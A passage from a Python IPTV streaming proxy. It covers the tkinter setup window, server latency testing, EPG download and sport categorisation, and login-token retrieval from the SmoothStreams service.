<genre type="160" subtype="01">Tourism/Travel</genre>
<genre type="160" subtype="02">Handicraft</genre>
<genre type="160" subtype="03">Motoring</genre>
<genre type="160" subtype="04">Fitness & Health</genre>
<genre type="160" subtype="05">Cooking</genre>
<genre type="160" subtype="06">Advertisement/Shopping</genre>
<genre type="160" subtype="07">Gardening</genre>
<!---SPECIAL--->
<genre type="176">Special Characteristics</genre>
<genre type="176" subtype="01">Original Language</genre>
<genre type="176" subtype="02">Black & White</genre>
<genre type="176" subtype="03">Unpublished</genre>
<genre type="176" subtype="04">Live Broadcast</genre>
</genres>"""
f.write(xmldata)
f.close()
def writetemplate():
f = open(os.path.join(os.path.dirname(sys.argv[0]), 'Templates', 'device.xml'), 'w')
xmldata = """<root xmlns="urn:schemas-upnp-org:device-1-0">
<specVersion>
<major>1</major>
<minor>0</minor>
</specVersion>
<URLBase>{{ data.BaseURL }}</URLBase>
<device>
<deviceType>urn:schemas-upnp-org:device:MediaServer:1</deviceType>
<friendlyName>{{ data.FriendlyName }}</friendlyName>
<manufacturer>{{ data.Manufacturer }}</manufacturer>
<modelName>{{ data.ModelNumber }}</modelName>
<modelNumber>{{ data.ModelNumber }}</modelNumber>
<serialNumber></serialNumber>
<UDN>uuid:{{ data.DeviceID }}</UDN>
</device>
</root>"""
f.write(xmldata)
f.close()
############################################################
# INSTALL GUI
############################################################
if not HEADLESS:
class ToggledFrame(tkinter.Frame):
def __init__(self, parent, text="", *args, **options):
tkinter.Frame.__init__(self, parent, *args, **options)
self.show = tkinter.IntVar()
self.show.set(0)
self.title_frame = tkinter.Frame(self)
self.title_frame.pack(fill="x", expand=1)
tkinter.Label(self.title_frame, text=text).pack(side="left", fill="x", expand=1)
self.toggle_button = tkinter.Checkbutton(self.title_frame, width=2, text='+', command=self.toggle,
variable=self.show)
self.toggle_button.pack(side="left")
self.sub_frame = tkinter.Frame(self, relief="sunken", borderwidth=1)
def toggle(self):
if bool(self.show.get()):
self.sub_frame.pack(fill="x", expand=1)
self.toggle_button.configure(text='-')
else:
self.sub_frame.forget()
self.toggle_button.configure(text='+')
class GUI(tkinter.Frame):
def client_exit(self, root):
root.destroy()
def __init__(self, master):
tkinter.Frame.__init__(self, master)
self.t1 = tkinter.StringVar()
self.t1.set("Minimum Settings")
t1 = tkinter.Label(master, textvariable=self.t1, height=2)
t1.grid(row=1, column=2)
self.labelUsername = tkinter.StringVar()
self.labelUsername.set("Username")
labelUsername = tkinter.Label(master, textvariable=self.labelUsername, height=2)
labelUsername.grid(row=2, column=1)
#
userUsername = tkinter.StringVar()
userUsername.set("blogs@hotmail.com")
self.username = tkinter.Entry(master, textvariable=userUsername, width=30)
self.username.grid(row=2, column=2)
#
self.noteUsername = tkinter.StringVar()
self.noteUsername.set("mystreams will not be an email address")
noteUsername = tkinter.Label(master, textvariable=self.noteUsername, height=2)
noteUsername.grid(row=2, column=3)
self.labelPassword = tkinter.StringVar()
self.labelPassword.set("Password")
labelPassword = tkinter.Label(master, textvariable=self.labelPassword, height=2)
labelPassword.grid(row=3, column=1)
#
userPassword = tkinter.StringVar()
userPassword.set("blogs123")
self.password = tkinter.Entry(master, textvariable=userPassword, width=30)
self.password.grid(row=3, column=2)
self.labelSite = tkinter.StringVar()
self.labelSite.set("Site")
labelSite = tkinter.Label(master, textvariable=self.labelSite, height=2)
labelSite.grid(row=4, column=1)
userSite = tkinter.StringVar()
userSite.set('StreamTVnow')
self.site = tkinter.OptionMenu(master, userSite, *[x[0] for x in providerList])
self.site.grid(row=4, column=2)
t2 = ToggledFrame(master, text='Optional', relief="raised", borderwidth=1)
t2.grid(row=5, column=1, columnspan=3)
self.labelServer = tkinter.StringVar()
self.labelServer.set("Server")
labelServer = tkinter.Label(t2.sub_frame, textvariable=self.labelServer, height=2)
labelServer.grid(row=1, column=1)
userServer = tkinter.StringVar()
userServer.set('Auto')
self.server = tkinter.OptionMenu(t2.sub_frame, userServer, *['Auto'] + [x[0] for x in serverList])
self.server.grid(row=1, column=2)
self.labelStream = tkinter.StringVar()
self.labelStream.set("Stream Type")
labelStream = tkinter.Label(t2.sub_frame, textvariable=self.labelStream, height=2)
labelStream.grid(row=2, column=1)
userStream = tkinter.StringVar()
userStream.set('HLS')
self.stream = tkinter.OptionMenu(t2.sub_frame, userStream, *[x.upper() for x in streamtype])
self.stream.grid(row=2, column=2)
self.labelQuality = tkinter.StringVar()
self.labelQuality.set("Quality")
labelQuality = tkinter.Label(t2.sub_frame, textvariable=self.labelQuality, height=2)
labelQuality.grid(row=3, column=1)
userQuality = tkinter.StringVar()
userQuality.set('HD')
self.quality = tkinter.OptionMenu(t2.sub_frame, userQuality, *[x[0] for x in qualityList])
self.quality.grid(row=3, column=2)
self.labelIP = tkinter.StringVar()
self.labelIP.set("Listen IP")
labelIP = tkinter.Label(t2.sub_frame, textvariable=self.labelIP, height=2)
labelIP.grid(row=4, column=1)
userIP = tkinter.StringVar()
userIP.set(LISTEN_IP)
self.ip = tkinter.Entry(t2.sub_frame, textvariable=userIP, width=30)
self.ip.grid(row=4, column=2)
self.noteIP = tkinter.StringVar()
self.noteIP.set("If using on other machines then set a static IP and use that.")
noteIP = tkinter.Label(t2.sub_frame, textvariable=self.noteIP, height=2)
noteIP.grid(row=4, column=3)
self.labelPort = tkinter.StringVar()
self.labelPort.set("Listen Port")
labelPort = tkinter.Label(t2.sub_frame, textvariable=self.labelPort, height=2)
labelPort.grid(row=5, column=1)
userPort = tkinter.IntVar()
userPort.set(LISTEN_PORT)
self.port = tkinter.Entry(t2.sub_frame, textvariable=userPort, width=30)
self.port.grid(row=5, column=2)
self.notePort = tkinter.StringVar()
self.notePort.set("If 80 doesn't work try 99")
notePort = tkinter.Label(t2.sub_frame, textvariable=self.notePort, height=2)
notePort.grid(row=5, column=3)
t3 = ToggledFrame(master, text='Advanced', relief="raised", borderwidth=1)
t3.grid(row=6, column=1, columnspan=3)
self.labelKodiPort = tkinter.StringVar()
self.labelKodiPort.set("KodiPort")
labelKodiPort = tkinter.Label(t3.sub_frame, textvariable=self.labelKodiPort, height=2)
labelKodiPort.grid(row=1, column=1)
userKodiPort = tkinter.IntVar(None)
userKodiPort.set(KODIPORT)
self.kodiport = tkinter.Entry(t3.sub_frame, textvariable=userKodiPort, width=30)
self.kodiport.grid(row=1, column=2)
self.noteKodiPort = tkinter.StringVar()
self.noteKodiPort.set("Only change if you've had to change the Kodi port")
noteKodiPort = tkinter.Label(t3.sub_frame, textvariable=self.noteKodiPort, height=2)
noteKodiPort.grid(row=1, column=3)
self.labelExternalIP = tkinter.StringVar()
self.labelExternalIP.set("External IP")
labelExternalIP = tkinter.Label(t3.sub_frame, textvariable=self.labelExternalIP, height=2)
labelExternalIP.grid(row=2, column=1)
userExternalIP = tkinter.StringVar()
userExternalIP.set(EXTIP)
self.externalip = tkinter.Entry(t3.sub_frame, textvariable=userExternalIP, width=30)
self.externalip.grid(row=2, column=2)
self.noteExternalIP = tkinter.StringVar()
self.noteExternalIP.set("Enter your public IP or Dynamic DNS,\nfor use when you wish to use this remotely.")
noteExternalIP = tkinter.Label(t3.sub_frame, textvariable=self.noteExternalIP, height=2)
noteExternalIP.grid(row=2, column=3)
self.labelExternalPort = tkinter.StringVar()
self.labelExternalPort.set("External Port")
labelExternalPort = tkinter.Label(t3.sub_frame, textvariable=self.labelExternalPort, height=2)
labelExternalPort.grid(row=3, column=1)
userExternalPort = tkinter.IntVar(None)
userExternalPort.set(EXTPORT)
self.extport = tkinter.Entry(t3.sub_frame, textvariable=userExternalPort, width=30)
self.extport.grid(row=3, column=2)
def gather():
global playlist, kodiplaylist, QUAL, QUALLIMIT, USER, PASS, SRVR, SITE, STRM, KODIPORT, LISTEN_IP, LISTEN_PORT, EXTIP, EXT_HOST, SERVER_HOST, EXTPORT
config = {}
config["username"] = userUsername.get()
config["password"] = userPassword.get()
config["stream"] = userStream.get().lower()
for sub in providerList:
if userSite.get() in sub[0]:
config["service"] = sub[1]
for sub in qualityList:
if userQuality.get() in sub[0]:
config["quality"] = sub[1]
config["ip"] = userIP.get()
config["port"] = userPort.get()
config["kodiport"] = userKodiPort.get()
config["externalip"] = userExternalIP.get()
config["externalport"] = userExternalPort.get()
QUAL = config["quality"]
USER = config["username"]
PASS = config["password"]
SITE = config["service"]
STRM = config["stream"]
KODIPORT = config["kodiport"]
LISTEN_IP = config["ip"]
LISTEN_PORT = config["port"]
EXTIP = config["externalip"]
EXTPORT = config["externalport"]
EXT_HOST = "http://" + EXTIP + ":" + str(EXTPORT)
SERVER_HOST = "http://" + LISTEN_IP + ":" + str(LISTEN_PORT)
if userServer.get() != 'Auto':
for sub in serverList:
if userServer.get() in sub[0]:
config["server"] = sub[1]
SRVR = config["server"]
else:
testServers(update_settings=True)
config["server"] = SRVR
config["server_spare"] = SRVR_SPARE
for widget in master.winfo_children():
widget.destroy()
with open(os.path.join(os.path.dirname(sys.argv[0]), 'proxysettings.json'), 'w') as fp:
dump(config, fp)
self.labelSetting1 = tkinter.StringVar()
self.labelSetting1.set("Open a web browser and go to %s for instructions and output URLs." % urljoin(SERVER_HOST, SERVER_PATH))
labelSetting1 = tkinter.Label(master, textvariable=self.labelSetting1, height=2)
labelSetting1.grid(row=1)
self.labelFooter = tkinter.StringVar()
self.labelFooter.set("URLs can also be found later on the YAP main screen after each launch")
labelFooter = tkinter.Label(master, textvariable=self.labelFooter, height=4)
labelFooter.grid(row=2)
button1 = tkinter.Button(master, text="Launch YAP!!", width=20,
command=lambda: self.client_exit(master))
button1.grid(row=3)
button1 = tkinter.Button(master, text="Submit", width=20, command=lambda: gather())
button1.grid(row=7, column=1, columnspan=3)
############################################################
# MISC
############################################################
TOKEN_PATH = os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'token.json')
def load_token():
global token
if os.path.exists(TOKEN_PATH):
with open(TOKEN_PATH, 'r') as fp:
token = load(fp)
logger.debug("Loaded token %r, expires at %s", token['hash'], token['expires'])
else:
dump_token()
def dump_token():
global token
with open(TOKEN_PATH, 'w') as fp:
dump(token, fp)
logger.debug("Dumped token.json")
def find_between(s, first, last):
try:
start = s.index(first) + len(first)
end = s.index(last, start)
return s[start:end]
except ValueError:
return ""
def dl_icons(channum):
# download icons to cache
logger.debug("Downloading icons")
icontemplate = 'https://guide.smoothstreams.tv/assets/images/channels/{0}.png'
# create blank icon
requests.urlretrieve(icontemplate.format(150), os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'empty.png'))
for i in range(1, channum + 1):
name = str(i) + '.png'
try:
requests.urlretrieve(icontemplate.format(i), os.path.join(os.path.dirname(sys.argv[0]), 'cache', name))
except:
continue
# logger.debug("No icon for channel:%s"% i)
logger.debug("Icon download completed.")
def thread_updater():
while True:
time.sleep(21600)
if __version__ < latest_ver:
logger.info(
"Your version (%s%s) is out of date, the latest is %s, which has now be downloaded for you into the 'updates' subdirectory." % (
type, __version__, latest_ver))
newfilename = ntpath.basename(latestfile)
if not os.path.isdir(os.path.join(os.path.dirname(sys.argv[0]), 'updates')):
os.mkdir(os.path.join(os.path.dirname(sys.argv[0]), 'updates'))
requests.urlretrieve(latestfile, os.path.join(os.path.dirname(sys.argv[0]), 'updates', newfilename))
def find_client(useragent):
if 'kodi' in useragent.lower():
return 'kodi'
elif 'vlc' in useragent.lower():
return 'vlc'
elif 'mozilla' in useragent.lower():
return 'browser'
elif 'mozilla' in useragent.lower():
return 'browser'
elif 'dalvik' in useragent.lower():
return 'perfectplayer'
elif 'lavf' in useragent.lower():
return 'plex'
elif 'tvheadend' in useragent.lower():
return 'tvh'
elif 'apple tv' in useragent.lower():
return 'atv'
elif 'smarthub' in useragent.lower():
return 'samsung'
elif 'tv' in useragent.lower():
return 'tv'
else:
return 'unk'
def averageList(lst):
logger.debug(repr(lst))
avg_ping = 0
avg_ping_cnt = 0
for p in lst:
try:
avg_ping += float(p)
avg_ping_cnt += 1
except:
logger.debug("Couldn't convert %s to float" % repr(p))
return avg_ping / avg_ping_cnt
def testServers(update_settings=True):
# todo
global SRVR, SRVR_SPARE, AUTO_SERVER
service = SRVR
res = None
res_host = None
res_spare = None
res_spare_host = None
ping = False
check_token()
# with util.xbmcDialogProgress('Testing servers...') as prog:
for name, host in serverList:
if 'mix' in name.lower():
continue
logger.info('Testing servers... %s' % name)
ping_results = False
try:
url = "https://" + host + ".SmoothStreams.tv:443/"+ SITE + "/ch01q1.stream/playlist.m3u8?wmsAuthSign=" + token['hash']
logger.debug('Testing url %s' % url)
# if platform.system() == 'Windows':
# p = subprocess.Popen(["ping", "-n", "4", url], stdout=subprocess.PIPE,
# stderr=subprocess.PIPE, shell=True)
# else:
# p = subprocess.Popen(["ping", "-c", "4", url], stdout=subprocess.PIPE,
# stderr=subprocess.PIPE)
#
# ping_results = re.compile("time=(.*?)ms").findall(str(p.communicate()[0]))
t1 = time.time()
response = req.get(url)
t2 = time.time()
if response.status_code == 200:
ping_results = t2 - t1
except:
logger.info("Platform doesn't support ping. Disable auto server selection")
AUTO_SERVER = False
return None
if ping_results:
logger.debug("Server %s - %s: n%s" % (name, host, ping_results))
avg_ping = ping_results
if avg_ping != 0:
if avg_ping < ping or not ping:
res_spare = res
res_spare_host = res_host
res = name
res_host = host
ping = avg_ping
if update_settings:
logger.info("Updating settings")
SRVR = str(host)
SRVR_SPARE = str(res_spare_host)
else:
logger.info("Couldn't get ping")
if res != None:
logger.info('Done Server with lowest response time ({0}) set to:%s'.format(ping) % res)
AUTO_SERVER = False
if res_spare != None:
logger.info('Backup Server with second lowest response time set to:%s' % res_spare)
logger.info("Done %s: %s" % (res, ping))
return res
def findChannelURL(input_url=None, qual='1', target_serv=SRVR, fail=0):
# todo, rtmp
global SRVR
service = SRVR
qlist = [qual] #, '1', '2', '3']
res = None
ping = False
for q in range(len(qlist)):
if q != 0 and qlist[q] == qual:
continue
options = []
if target_serv.startswith('dna') and fail != 2:
if 'dnaw' in target_serv and fail ==0:
options = [(name, host) for (name, host) in serverList if host.startswith('dnaw')]
elif 'dnae' in target_serv and fail ==0:
options = [(name, host) for (name, host) in serverList if host.startswith('dnae')]
else:
options = [(name, host) for (name, host) in serverList if host.startswith('dna')]
elif target_serv.startswith('deu') and fail != 2:
if 'deu-nl' in target_serv and fail == 0:
options = [(name, host) for (name, host) in serverList if host.startswith('deu-nl')]
elif 'deu-uk' in target_serv and fail == 0:
options = [(name, host) for (name, host) in serverList if host.startswith('deu-uk')]
else:
options = [(name, host) for (name, host) in serverList if host.startswith('deu')]
else:
# asia
options = serverList
for name, host in options:
if 'mix' in name.lower():
continue
td = False
try:
url = input_url.replace('SRVR', host).replace('QUAL', qlist[q])
# url = find_between(url,"://",":")
logger.debug('Testing url %s' % url)
# if platform.system() == 'Windows':
# p = subprocess.Popen(["ping", "-n", "4", url], stdout=subprocess.PIPE,
# stderr=subprocess.PIPE, shell=True)
# else:
# p = subprocess.Popen(["ping", "-c", "4", url], stdout=subprocess.PIPE,
# stderr=subprocess.PIPE)
#
# ping_results = re.compile("time=(.*?)ms").findall(str(p.communicate()[0]))
t1 = time.time()
response = req.get(url)
t2 = time.time()
if response.status_code == 200:
td = t2 - t1
except:
logger.info("Platform doesn't support ping. Disable auto server selection")
return None
if td:
logger.debug("Server %s - %s: %s" % (name, host, repr(td)))
avg_ping = td
if avg_ping != 0:
if avg_ping < ping or not ping:
res = url
res = input_url.replace('SRVR', host).replace('QUAL', qlist[q])
ping = avg_ping
else:
logger.info("Couldn't get ping")
if res != None:
logger.info('Done Server with lowest ping ({0}) set to:%s'.format(ping) % res)
return res
logger.info("Failed to find that channel on a similar quality or server")
if fail < 2:
return findChannelURL(input_url, qual='1', fail=fail+1)
logger.info("Failed to find that channel on any quality or server")
return input_url
############################################################
# EPG
############################################################
def dl_epg(source=1):
global chan_map, fallback
# download epg xml
source = 2 if fallback == True else 1
if os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'epg.xml')):
existing = os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'epg.xml')
cur_utc_hr = datetime.utcnow().replace(microsecond=0, second=0, minute=0).hour
target_utc_hr = (cur_utc_hr // 4) * 4
target_utc_datetime = datetime.utcnow().replace(microsecond=0, second=0, minute=0, hour=target_utc_hr)
logger.debug("utc time is: %s, utc target time is: %s, file time is: %s" % (
datetime.utcnow(), target_utc_datetime, datetime.utcfromtimestamp(os.stat(existing).st_mtime)))
if os.path.isfile(existing) and os.stat(existing).st_mtime > target_utc_datetime.timestamp():
logger.debug("Skipping download of epg")
return
to_process = []
# override the xml with one of your own
if source == 1:
if OVRXML != '':
if OVRXML.startswith('http://') or OVRXML.startswith('https://'):
if OVRXML.endswith('.gz') or OVRXML.endswith('.gz?raw=1'):
requests.urlretrieve(OVRXML, os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'rawovrepg.xml.gz'))
unzipped = os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'rawovrepg.xml.gz')
else:
requests.urlretrieve(OVRXML, os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'rawovrepg.xml'))
unzipped = os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'rawovrepg.xml')
else:
unzipped = OVRXML
else:
logger.info("Downloading epg")
requests.urlretrieve("https://fast-guide.smoothstreams.tv/altepg/xmltv5.xml.gz",
os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'rawepg.xml.gz'))
unzipped = os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'rawepg.xml.gz')
to_process.append([unzipped, "epg.xml", 'fog' if OVRXML == '' else 'ovr'])
requests.urlretrieve("https://fast-guide.smoothstreams.tv/feed.xml",
os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'rawsports.xml'))
unzippedsports = os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'rawsports.xml')
to_process.append([unzippedsports, "sports.xml", 'sstv'])
else:
logger.info("Downloading sstv epg")
requests.urlretrieve("https://fast-guide.smoothstreams.tv/feed.xml",
os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'rawepg.xml'))
unzipped = os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'rawepg.xml')
to_process.append([unzipped, "epg.xml", 'sstv'])
to_process.append([unzipped, "sports.xml", 'sstv'])
for process in to_process:
# try to categorise the sports events
try:
if process[0].endswith('.gz'):
opened = gzip.open(process[0])
else:
opened = open(process[0], encoding="UTF-8")
tree = ET.parse(opened)
root = tree.getroot()
changelist = {}
# remove fogs xmltv channel names for readability in PLex Live
if process[2] == 'fog':
for a in tree.iterfind('channel'):
b = a.find('display-name')
newname = [chan_map[x].channum for x in range(len(chan_map) + 1) if
x != 0 and chan_map[x].epg == a.attrib['id'] and chan_map[x].channame == b.text]
if len(newname) > 1:
logger.debug("EPG rename conflict %s" % ",".join(newname))
# It's a list regardless of length so first item is always wanted.
newname = newname[0]
changelist[a.attrib['id']] = newname
a.attrib['id'] = newname
for a in tree.iterfind('programme'):
if process[2] == 'fog':
try:
a.attrib['channel'] = changelist[a.attrib['channel']]
except:
logger.info("A programme was skipped as it couldn't be assigned to a channel, refer log.")
logger.debug(a.find('title').text, a.attrib)
for b in a.findall('title'):
ET.SubElement(a, 'category')
c = a.find('category')
ep_num = a.find('episode-num')
if ep_num is not None:
c.text = "Series"
else:
c.text = "Sports"
if 'nba' in b.text.lower() or 'nba' in b.text.lower() or 'ncaam' in b.text.lower():
c.text = "Basketball"
elif 'nfl' in b.text.lower() or 'football' in b.text.lower() or 'american football' in b.text.lower() or 'ncaaf' in b.text.lower() or 'cfb' in b.text.lower():
c.text = "Football"
elif 'epl' in b.text.lower() or 'efl' in b.text.lower() or 'soccer' in b.text.lower() or 'ucl' in b.text.lower() or 'mls' in b.text.lower() or 'uefa' in b.text.lower() or 'fifa' in b.text.lower() or 'fc' in b.text.lower() or 'la liga' in b.text.lower() or 'serie a' in b.text.lower() or 'wcq' in b.text.lower():
c.text = "Soccer"
elif 'rugby' in b.text.lower() or 'nrl' in b.text.lower() or 'afl' in b.text.lower():
c.text = "Rugby"
elif 'cricket' in b.text.lower() or 't20' in b.text.lower():
c.text = "Cricket"
elif 'tennis' in b.text.lower() or 'squash' in b.text.lower() or 'atp' in b.text.lower():
c.text = "Tennis/Squash"
elif 'f1' in b.text.lower() or 'nascar' in b.text.lower() or 'motogp' in b.text.lower() or 'racing' in b.text.lower():
c.text = "Motor Sport"
elif 'golf' in b.text.lower() or 'pga' in b.text.lower():
c.text = "Golf"
elif 'boxing' in b.text.lower() or 'mma' in b.text.lower() or 'ufc' in b.text.lower() or 'wrestling' in b.text.lower() or 'wwe' in b.text.lower():
c.text = "Martial Sports"
elif 'hockey' in b.text.lower() or 'nhl' in b.text.lower() or 'ice hockey' in b.text.lower():
c.text = "Ice Hockey"
elif 'baseball' in b.text.lower() or 'mlb' in b.text.lower() or 'beisbol' in b.text.lower() or 'minor league' in b.text.lower():
c.text = "Baseball"
elif 'news' in b.text.lower():
c.text = "News"
# c = a.find('category')
# if c.text == 'Sports':
# print(b.text)
tree.write(os.path.join(os.path.dirname(sys.argv[0]), 'cache', process[1]))
logger.debug("writing to %s" % process[1])
# add xml header to file for Kodi support
with open(os.path.join(os.path.dirname(sys.argv[0]), 'cache', process[1]), 'r+') as f:
content = f.read()
staticinfo = '''<channel id="static_refresh"><display-name lang="en">Static Refresh</display-name><icon src="http://speed.guide.smoothstreams.tv/assets/images/channels/150.png" /></channel><programme channel="static_refresh" start="20170118213000 +0000" stop="20201118233000 +0000"><title lang="us">Press to refresh rtmp channels</title><desc lang="en">Select this channel in order to refresh the RTMP playlist. Only use from the channels list and NOT the guide page. Required every 4hrs.</desc><category lang="us">Other</category><episode-num system="">1</episode-num></programme></tv>'''
content = content[:-5] + staticinfo
f.seek(0, 0)
f.write('<?xml version="1.0" encoding="UTF-8"?>'.rstrip('\r\n') + content)
except:
logger.exception(process[0])
if process[0] == "I:\\Video\\epg\\xmltv5.xml or URL":
logger.info("Proxy failed to parse the example XMLTV provided by the EXAMPLE advancedsettings.json")
else:
logger.info("Proxy failed to parse the XMLTV from %s" % process[0])
# started to create epg based off of the json but not needed
def dl_sstv_epg():
# download epg xml
# https://guide.smoothstreams.tv/feed-new-full-latest.zip
if os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'sstv_full.xml')):
existing = os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'sstv_full.xml')
cur_utc_hr = datetime.utcnow().replace(microsecond=0, second=0, minute=0).hour
target_utc_hr = (cur_utc_hr // 3) * 3
target_utc_datetime = datetime.utcnow().replace(microsecond=0, second=0, minute=0, hour=target_utc_hr)
logger.debug("utc time is: %s, utc target time is: %s, file time is: %s" % (
datetime.utcnow(), target_utc_datetime, datetime.utcfromtimestamp(os.stat(existing).st_mtime)))
if os.path.isfile(existing) and os.stat(existing).st_mtime > target_utc_datetime.timestamp():
logger.debug("Skipping download of epg")
return
logger.debug("Downloading sstv epg")
url = "https://guide.smoothstreams.tv/feed-new-full-latest.zip"
import zipfile
requests.urlretrieve(url, os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'testepg.zip'))
archive = zipfile.ZipFile(os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'testepg.zip'), 'r')
jsonepg = archive.read('feed-new-full.json')
epg = json.loads(jsonepg.decode('utf-8'))
json2xml(epg)
def json2xml(json_obj):
master = ET.Element('tv')
mtree = ET.ElementTree(master)
mroot = mtree.getroot()
data = json_obj.get('data')
for i, j in data.items():
displayname = j['name']
id = j['number']
icon = j['img']
subelement = ET.SubElement(master, 'channel', {'id': id})
ET.SubElement(subelement, 'icon', {'src': icon})
ET.SubElement(subelement, 'display-name')
c = subelement.find('display-name')
c.text = displayname
# input
# '''"851224591": {"name": "SportsCenter With Scott Van Pelt",
# "description": "Scott Van Pelt presents the day in sports through his unique perspective with highlights, special guests and his ``One Big Thing'' commentary.",
# "time": "1515232800", "runtime": 60, "version": "", "language": "us", "channel": "83",
# "category": 0, "parent_id": "0", "quality": "HQLQ", "source": "XMLTV"}'''
# sample output from fog
# <programme channel="I58690.labs.zap2it.com" start="20180105170000 +0000" stop="20180105180000 +0000">
# <title lang="en">NHL Hockey Central</title>
# <desc lang="en">News and highlights from around the NHL.</desc>
# <category lang="en">Ice Hockey</category><
# episode-num system="">EP02022073.0008</episode-num></programme>
for event in j['events']:
program = j['events'][event]
category = ""
if 'nba' in program['name'].lower() or 'nba' in program['name'].lower() or 'ncaam' in program[
'name'].lower():
category = "Basketball"
elif 'nfl' in program['name'].lower() or 'football' in program['name'].lower() or 'american football' in \
program['name'].lower() or 'ncaaf' in program['name'].lower() or 'cfb' in program['name'].lower():
category = "Football"
elif 'epl' in program['name'].lower() or 'efl' in program['name'].lower() or 'soccer' in program[
'name'].lower() or 'ucl' in program['name'].lower() or 'mls' in program['name'].lower() or 'uefa' in \
program['name'].lower() or 'fifa' in program['name'].lower() or 'fc' in program[
'name'].lower() or 'la liga' in program['name'].lower() or 'serie a' in program[
'name'].lower() or 'wcq' in program['name'].lower():
category = "Soccer"
elif 'rugby' in program['name'].lower() or 'nrl' in program['name'].lower() or 'afl' in program[
'name'].lower():
category = "Rugby"
elif 'cricket' in program['name'].lower() or 't20' in program['name'].lower():
category = "Cricket"
elif 'tennis' in program['name'].lower() or 'squash' in program['name'].lower() or 'atp' in program[
'name'].lower():
category = "Tennis/Squash"
elif 'f1' in program['name'].lower() or 'nascar' in program['name'].lower() or 'motogp' in program[
'name'].lower() or 'racing' in program['name'].lower():
category = "Motor Sport"
elif 'golf' in program['name'].lower() or 'pga' in program['name'].lower():
category = "Golf"
elif 'boxing' in program['name'].lower() or 'mma' in program['name'].lower() or 'ufc' in program[
'name'].lower() or 'wrestling' in program['name'].lower() or 'wwe' in program['name'].lower():
category = "Martial Sports"
elif 'hockey' in program['name'].lower() or 'nhl' in program['name'].lower() or 'ice hockey' in program[
'name'].lower():
category = "Ice Hockey"
elif 'baseball' in program['name'].lower() or 'mlb' in program['name'].lower() or 'beisbol' in program[
'name'].lower() or 'minor league' in program['name'].lower():
category = "Baseball"
start = datetime.utcfromtimestamp(int(program['time'])).strftime('%Y%m%d%H%M%S +0000')
stop = datetime.utcfromtimestamp(int(program['time']) + 60 * int(program['runtime'])).strftime(
'%Y%m%d%H%M%S +0000')
subelement = ET.SubElement(master, 'programme', {'id': id, 'start': start, 'stop': stop})
p_title = ET.SubElement(subelement, 'title', {'lang': program['language']})
p_title.text = program['name']
p_desc = ET.SubElement(subelement, 'desc', {'lang': program['language']})
p_desc.text = program['description']
p_genre = ET.SubElement(subelement, 'category', {'lang': program['language']})
p_genre.text = category
mtree.write(os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'sstv_full.xml'))
return
def getProgram(channel):
global jsonGuide1, jsonGuide2
tmNow = time.localtime(time.time() + GUIDELOOKAHEAD * 60)
sched_offest = EST5EDT().utc_seconds()
retVal = programinfo()
local_off = datetime.utcoffset(datetime.utcnow().replace(tzinfo=dt.timezone.utc).astimezone(tz=None)).total_seconds()
if str(int(channel)) in jsonGuide1:
oChannel = jsonGuide1[str(int(channel))]
retVal.channel = channel
retVal.channelname = oChannel["name"].replace(format(channel, "02") + " - ", "").strip()
for item in oChannel["items"]:
startTime = time.localtime(time.mktime(datetime.strptime(item["time"], '%Y-%m-%d %H:%M:%S').timetuple()) - sched_offest + local_off)
endTime = time.localtime(time.mktime(datetime.strptime(item["end_time"], '%Y-%m-%d %H:%M:%S').timetuple()) - sched_offest + local_off)
if startTime < tmNow and endTime > tmNow:
retVal.category = item["category"].strip()
retVal.quality = item["quality"].upper()
retVal.language = item["language"].upper()
retVal.title = item["name"].strip()
retVal.description = item["description"].strip()
retVal.channel = channel
retVal.startTime = startTime
retVal.endTime = endTime
retVal.timeRange = time.strftime("%H:%M", startTime) + "-" + time.strftime("%H:%M", endTime)
return retVal
if str(int(channel)) in jsonGuide2:
oChannel = jsonGuide2[str(int(channel))]
retVal.channel = channel
retVal.channelname = oChannel["name"].replace(format(channel, "02") + " - ", "").strip()
for item in oChannel["items"]:
startTime = time.strptime(item["time"], '%Y-%m-%d %H:%M:%S')
endTime = time.strptime(item["end_time"], '%Y-%m-%d %H:%M:%S')
if startTime < tmNow and endTime > tmNow:
retVal.category = item["category"].strip()
retVal.quality = item["quality"].upper()
retVal.language = item["language"].upper()
retVal.title = item["name"].strip()
retVal.description = item["description"].strip()
retVal.channel = channel
retVal.startTime = startTime
retVal.endTime = endTime
retVal.timeRange = time.strftime("%H:%M", startTime) + "-" + time.strftime("%H:%M", endTime)
return retVal
return retVal
def getJSON(sFile, sURL, sURL2):
try:
if os.path.isfile(sFile) and time.time() - os.stat(sFile).st_mtime < 3600:
retVal = json.loads(open(sFile, 'r').read())
return retVal
except:
pass
try:
sJSON = urllib.request.urlopen(sURL).read().decode("utf-8")
retVal = json.loads(sJSON)
except:
try:
sJSON = urllib.request.urlopen(sURL2).read().decode("utf-8")
retVal = json.loads(sJSON)
except:
return json.loads("{}")
try:
file = open(sFile, "w+")
file.write(sJSON)
file.close()
except:
pass
return retVal
############################################################
# SSTV
############################################################
def get_auth_token(user, passwd, site):
if site == 'vaders':
baseUrl = "http://vapi.vaders.tv/vod/user?"
# will return userinfo but not hash, hash is just user+pass hashed together, refer playlist generation
return
elif site == 'viewmmasr' or site == 'mmatv':
baseUrl = 'https://www.mma-tv.net/loginForm.php?'
else:
baseUrl = 'https://auth.smoothstreams.tv/hash_api.php?'
params = {
"username": user,
"password": passwd,
"site": site
}
session = req.Session()
url = baseUrl + urllib.parse.urlencode(params)
try:
data = session.post(url, params).json()
except:
data = json.loads(requests.urlopen(url).read().decode("utf--8"))
# old
